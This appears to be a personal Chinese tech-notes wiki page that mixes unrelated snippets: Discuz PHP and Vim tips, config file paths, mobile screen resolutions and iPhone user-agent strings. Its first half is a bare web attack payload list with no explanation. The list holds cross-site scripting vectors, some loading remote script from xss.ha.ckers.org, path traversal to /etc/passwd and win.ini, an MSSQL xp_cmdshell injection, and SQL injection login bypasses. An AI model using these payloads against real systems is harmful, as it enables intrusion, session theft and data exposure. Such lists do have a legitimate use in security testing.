搞基百科 - 有码的百科全书

\'><script>alert(document.cookie)</script>
=\'><script>alert(document.cookie)</script>
<script>alert(document.cookie)</script>
<script>alert(vulnerable)</script>
%3Cscript%3Ealert(\'XSS\')%3C/script%3E
<script>alert(\'XSS\')</script>
<img src=\"javascript:alert(\'XSS\')\">
%0a%0a<script>alert(\\\"Vulnerable\\\")</script>.jsp
%22%3cscript%3ealert(%22xss%22)%3c/script%3e
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html
%3f.jsp
%3f.jsp
<script>alert(\'Vulnerable\');</script>
<script>alert(\'Vulnerable\')</script>
?sql_debug=1
a%5c.aspx
a.jsp/<script>alert(\'Vulnerable\')</script>
a/
a?<script>alert(\'Vulnerable\')</script>
\"><script>alert(\'Vulnerable\')</script>
\';exec%20master..xp_cmdshell%20\'dir%20 c:%20>%20c:\\inetpub\\wwwroot\\?.txt\'--&&
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
%3Cscript%3Ealert(document. domain);%3C/script%3E&
%3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID=
1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=
../../../../../../../../etc/passwd
..\\..\\..\\..\\..\\..\\..\\..\\windows\\system.ini
\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\system.ini
\'\';!--\"<XSS>=&{()}
<IMG SRC=\"javascript:alert(\'XSS\');\">
<IMG SRC=javascript:alert(\'XSS\')>
<IMG SRC=JaVaScRiPt:alert(\'XSS\')>
<IMG SRC=JaVaScRiPt:alert(\"XSS\")>
<IMG SRC=javascript:alert(\'XSS\')>
<IMG SRC=javascript:alert(\'XSS\')>
<IMG SRC=javascript:alert(\'XSS\')>
<IMG SRC=\"jav ascript:alert(\'XSS\');\">
<IMG SRC=\"jav ascript:alert(\'XSS\');\">
<IMG SRC=\"jav ascript:alert(\'XSS\');\">
\"<IMG SRC=java\\0script:alert(\\\"XSS\\\")>\";\' > out
<IMG SRC=\" javascript:alert(\'XSS\');\">
<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
<BODY BACKGROUND=\"javascript:alert(\'XSS\')\">
<BODY ONLOAD=alert(\'XSS\')>
<IMG DYNSRC=\"javascript:alert(\'XSS\')\">
<IMG LOWSRC=\"javascript:alert(\'XSS\')\">
<BGSOUND SRC=\"javascript:alert(\'XSS\');\">
<br size=\"&{alert(\'XSS\')}\">
<LAYER SRC=\"http://xss.ha.ckers.org/a.js\"></layer>
<LINK REL=\"stylesheet\" HREF=\"javascript:alert(\'XSS\');\">
<IMG SRC=\'vbscript:msgbox(\"XSS\")\'>
<IMG SRC=\"mocha:[code]\">
<IMG SRC=\"livescript:[code]\">
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert(\'XSS\');\">
<IFRAME SRC=javascript:alert(\'XSS\')></IFRAME>
<FRAMESET><FRAME SRC=javascript:alert(\'XSS\')></FRAME></FRAMESET>
<TABLE BACKGROUND=\"javascript:alert(\'XSS\')\">
<DIV STYLE=\"background-image: url(javascript:alert(\'XSS\'))\">
<DIV STYLE=\"behaviour: url(\'http://www.how-to-hack.org/exploit.html\');\">
<DIV STYLE=\"width: expression(alert(\'XSS\'));\">
<STYLE>@im\\port\'\\ja\\vasc\\ript:alert(\"XSS\")\';</STYLE>
<IMG STYLE=\'xss:expre\\ssion(alert(\"XSS\"))\'>
<STYLE TYPE=\"text/javascript\">alert(\'XSS\');</STYLE>
<STYLE TYPE=\"text/css\">.XSS{background-image:url(\"javascript:alert(\'XSS\')\");}</STYLE><A CLASS=XSS></A>
<STYLE type=\"text/css\">BODY{background:url(\"javascript:alert(\'XSS\')\")}</STYLE>
<BASE HREF=\"javascript:alert(\'XSS\');//\">
getURL(\"javascript:alert(\'XSS\')\")
a=\"get\";b=\"URL\";c=\"javascript:\";d=\"alert(\'XSS\');\";eval(a+b+c+d);
<XML SRC=\"javascript:alert(\'XSS\');\">
\"> <BODY ONLOAD=\"a();\"><SCRIPT>function a(){alert(\'XSS\');}</SCRIPT><\"
<SCRIPT SRC=\"http://xss.ha.ckers.org/xss.jpg\"></SCRIPT>
<IMG SRC=\"javascript:alert(\'XSS\')\"
<!--#exec cmd=\"/bin/echo \'<SCRIPT SRC\'\"--><!--#exec cmd=\"/bin/echo \'=http://xss.ha.ckers.org/a.js></SCRIPT>\'\"-->
<IMG SRC=\"http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode\">
<SCRIPT a=\">\" SRC=\"http://xss.ha.ckers.org/a.js\"></SCRIPT>
<SCRIPT =\">\" SRC=\"http://xss.ha.ckers.org/a.js\"></SCRIPT>
<SCRIPT a=\">\" \'\' SRC=\"http://xss.ha.ckers.org/a.js\"></SCRIPT>
<SCRIPT \"a=\'>\'\" SRC=\"http://xss.ha.ckers.org/a.js\"></SCRIPT>
<SCRIPT>document.write(\"<SCRI\");</SCRIPT>PT SRC=\"http://xss.ha.ckers.org/a.js\"></SCRIPT>
<A HREF=http://www.gohttp://www.google.com/ogle.com/>link</A>
admin\'--
\' or 0=0 --
\" or 0=0 --
or 0=0 --
\' or 0=0 #
\" or 0=0 #
or 0=0 #
\' or \'x\'=\'x
\" or \"x\"=\"x
\') or (\'x\'=\'x
\' or 1=1--
\" or 1=1--
or 1=1--
\' or a=a--
\" or \"a\"=\"a
\') or (\'a\'=\'a
\") or (\"a\"=\"a
hi\" or \"a\"=\"a
hi\" or 1=1 --
hi\' or 1=1 --
hi\' or \'a\'=\'a
hi\') or (\'a\'=\'a
hi\") or (\"a\"=\"a 

修改.include/viewthread_activity.inc.php文件中，找到：

$query = $db->query("SELECT aa.username, aa.uid, aa.dateline, m.groupid, mf.avatar FROM {$tablepre}activityapplies aa
LEFT JOIN {$tablepre}members m USING(uid)
LEFT JOIN {$tablepre}memberfields mf USING(uid)
WHERE aa.tid='$tid' $sqlverified ORDER BY aa.dateline DESC LIMIT 9"

删掉 LIMIT 9

From the Vim Wiki.

在windows系统里,寻找 $HOME 最好的方法就是跑一些命令

:version
:echo expand('~')
:echo $HOME
:echo $VIM
:echo $VIMRUNTIME

安装目录有个文件叫 vimrc_example.vim 有兴趣读一下


/include/configure.php
/admin/include/configure.php

DB信息以及绝对路径修改

Safari Dev Center
http://developer.apple.com/safari/

分辨率

iPad
显示屏 *.9.7 英寸 (对角线) LED 背光镜面宽屏幕 Multi-Touch 显示屏，具有 IPS 技术 * .1024 x 768 分辨率， 132 ppi 清晰度耐指纹抗油涂层支持多种语言文字同时显示

iPhone
480*320，3.5寸

iPhone4
640*960，3.5寸

Android
从默认HVGA 320x480 到 WVGA  480x800 、FWVGA 480x854 以及QVGA的240x320

QVGA(Quarter VGA)：其分辨率为240×320像素，是当下智能手机最常用的分辨率级别。240×320像素的意思就是，手机屏幕横向每行有240个象素点，纵向每 列有320个象素点，乘起来就是320×240=76800个象素点。早期的智能手机也大都采用这一显示级别的屏幕。

HVGA(Half-size VGA)：其分辨率为480×320像素，宽高比为3：2。一直都很热销的iPhone和黑莓的Bold 9000，还有全球第一款Android系统手机谷歌G1都采用了这一显示级别的屏幕。

图为：iPhone 3GS手机 和 黑莓Bold 9000手机

VGA(Video Graphics Array)是早起IBM提出的电脑显示标准，但现在已经应用于手机产品的显示上。其分辨率为640×480像素，宽高比为5：4。昔日的HTC机皇Diamond采用的就是VGA分辨率。

WVGA(Wide VGA)是VGA的宽屏模式，分辨率更是达到了800×480像素和854×480像素两种，HTC后来生产的Diamond 2和Touch HD就是WVGA的代表作。

图为：HTC Diamond 2手机 和 HTC Touch HD手机

单纯就屏幕显示来说，分辨率和屏幕大小也不是一点关系没有。假设屏幕大小一定，那么分辨率越高屏幕显示就越清晰；相同的道理，假如分辨率一定，屏幕越小显示图像也就越清晰。这样的话，960×640分辨率加上3.5英寸的显示屏，iPhone4显然要高于这些机型。

User-Agent

Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobile/1A543a Safari/419.3

Mozilla/5.0 (iPod; U; CPU like Mac OS X; en) AppleWebKit/420.1 (KHTML, like Gecko) Version/3.0 Mobile/3A101a Safari/419.3